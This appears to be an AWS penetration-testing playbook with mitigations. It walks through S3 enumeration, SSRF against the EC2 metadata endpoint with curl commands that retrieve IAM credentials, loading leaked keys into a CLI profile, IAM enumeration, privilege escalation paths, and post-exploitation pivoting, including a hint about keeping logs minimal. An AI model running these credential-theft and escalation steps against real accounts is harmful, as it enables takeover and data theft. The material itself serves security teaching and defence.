AWS
Amazon Web Services
AWS Cloud Pentesting Playbook
This playbook outlines foundational concepts of AWS architecture and provides technical guidance and attack strategies derived from practical labs and real-world exploitation scenarios. Each section includes purpose, context, exploitation techniques, AWS CLI commands, and mitigation strategies to guide red teamers, cloud security engineers, and blue teams.
1. AWS Cloud Architecture
Cloud Space Overview
Purpose: Understand AWS architectural layers and potential attack vectors.
Front-End: AWS Management Console (Web GUI).
Control Plane: Manages orchestration of AWS services (e.g., EC2 start/stop, IAM configuration).
Data Plane: Hosts actual data/compute resources (e.g., S3, EC2).
Security Insight:
Control Plane compromise = full account takeover.
Data Plane compromise = data exfiltration, service abuse.
2. Entry Point Identification
S3 Bucket Enumeration
Purpose: Identify open buckets leaking data.
Tools:
osint.sh
(for domain/asset discovery)
Command:
cloudenum -k examplecorp -o results.txt
Example Attack:
http://public-examplecorp.s3.amazonaws.com/internal-ip.txt
Mitigation:
Disable public access unless required.
Enforce IAM bucket policies and block public ACLs.
3. SSRF to EC2 Metadata Extraction
Purpose: Abuse SSRF to steal instance credentials.
Target Endpoint: http://169.254.169.254/latest/meta-data/
Command Sequence:
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
Mitigation:
Enable IMDSv2.
Restrict outbound traffic from EC2s.
4. Credential Injection and Identity Confirmation
Using Leaked/Extracted Credentials
Setup Profile:
aws configure --profile pentest-profile
Or edit ~/.aws/credentials
:
[pentest-profile]
aws_access_key_id = AKIA...
aws_secret_access_key = ...
aws_session_token = ...
Verify Identity:
aws sts get-caller-identity --profile pentest-profile
Mitigation:
Monitor STS usage.
Rotate credentials regularly.
5. IAM Enumeration
Purpose: Discover all user/group/role/policy relationships.
Commands:
aws iam get-user --profile pentest-profile
aws iam list-groups-for-user --user-name dev-user --profile pentest-profile
aws iam list-roles --profile pentest-profile
aws iam list-attached-user-policies --user-name dev-user --profile pentest-profile
aws iam list-user-policies --user-name dev-user --profile pentest-profile
aws iam get-user-policy --user-name dev-user --policy-name DevPolicy --profile pentest-profile
Mitigation:
Regularly audit users and their permissions.
Restrict over-privileged accounts.
6. AWS Credential Types
Long-Term vs Short-Term Keys
Identification:
echo $AWS_ACCESS_KEY_ID
# AKIA → Long-term
# ASIA → Temporary STS
Mitigation:
Use IAM roles and short-term credentials.
Avoid hardcoding credentials.
7. Privilege Escalation Techniques
1. Create New Policy Version
iam:CreatePolicyVersion
Attack: Create a permissive version and set it as default.
2. Pass Existing Role to EC2
iam:PassRole + ec2:RunInstances
Attack: Launch EC2 with elevated role.
3. Attach Policy to Self
iam:AttachUserPolicy, iam:AttachGroupPolicy, iam:AttachRolePolicy
4. Modify Trust Policy
iam:UpdateAssumeRolePolicy
Mitigation (all):
Restrict risky IAM actions.
Monitor CloudTrail logs for policy updates.
8. API Gateway & Lambda Enumeration
Concept: Using Read-Only Permissions to Enumerate and Access Internal APIs
Step-by-Step Exploitation:
Identify current user:
aws iam get-user --profile pentest-profile
List attached user policies:
aws iam list-attached-user-policies --user-name <username> --profile pentest-profile
Get policy ARN and version:
aws iam get-policy --policy-arn arn:aws:iam::<account>:policy/<policy-name> --profile pentest-profile
aws iam get-policy-version --policy-arn arn:aws:iam::<account>:policy/<policy-name> --version-id <version-id> --profile pentest-profile
Look for
apigateway:GET
permissions.
List Lambda functions:
aws lambda list-functions --region us-west-2 --profile pentest-profile
Get Lambda execution policy:
aws lambda get-policy --function-name <function-name> --region us-west-2 --profile pentest-profile
Reveals execute-api ARN associated with API Gateway
Get API Gateway stages:
aws apigateway get-stages --rest-api-id <api-id> --region us-west-2 --profile pentest-profile
Visit discovered endpoint:
https://<api-id>.execute-api.us-west-2.amazonaws.com/<stage>/<resource>
Security Insight:
Chained enumeration of Lambda policies and API Gateway resources allows attackers to invoke undocumented APIs.
Least privilege IAM roles and separation of read/write policies are critical.
9. Key Attack Scenarios Summary
Attack Vector
Tools/Technique
Goal
Public S3 Buckets
cloudenum
Find leaked configs/creds
SSRF to Metadata
curl, web exploit
Extract STS creds
IAM Enumeration & Abuse
aws iam list-*
Discover and misuse privileges
Abusing STS Temporary Tokens
aws sts
Lateral movement
Misconfigured Trust Relationships
AssumeRole abuse
Privileged role pivoting
Lambda Exposure via API Gateway
apigateway, lambda CLI
Discover and invoke hidden resources
10. AWS Services Recap (Security Lens)
IAM
Central identity system.
Monitor role assumptions.
Use permission boundaries and SCPs.
EC2
Protect metadata service (IMDSv2).
Monitor user-data for secrets.
S3
Disable public buckets.
Enforce bucket policies and access logs.
Lambda
Lock down execution policies.
Avoid wide API Gateway access.
API Gateway
Monitor stage and resource exposure.
Validate CORS and auth settings.
CloudTrail & GuardDuty
Enable full logging.
Alert on anomalous API usage (e.g.,
sts:AssumeRole
,iam:PassRole
).
11. AWS Pentesting Flow Summary
Reconnaissance
Tools:
cloudenum
,osint.sh
,whoami
Targets: IAM users, S3, EC2 metadata, Lambda/APIGW
Exploitation
SSRF → Metadata → STS tokens
IAM → Privilege escalation
Post-Exploitation
Use AWS CLI for enumeration
Dump data (S3), invoke functions (Lambda), pivot roles (STS)
Lateral Movement
Abuse trust policies
Use minimal logs with
aws sts assume-role
End of Playbook
This playbook emphasizes both offensive and defensive approaches to AWS environments. Proper hardening, monitoring, and the principle of least privilege are key to reducing attack surfaces.
Last updated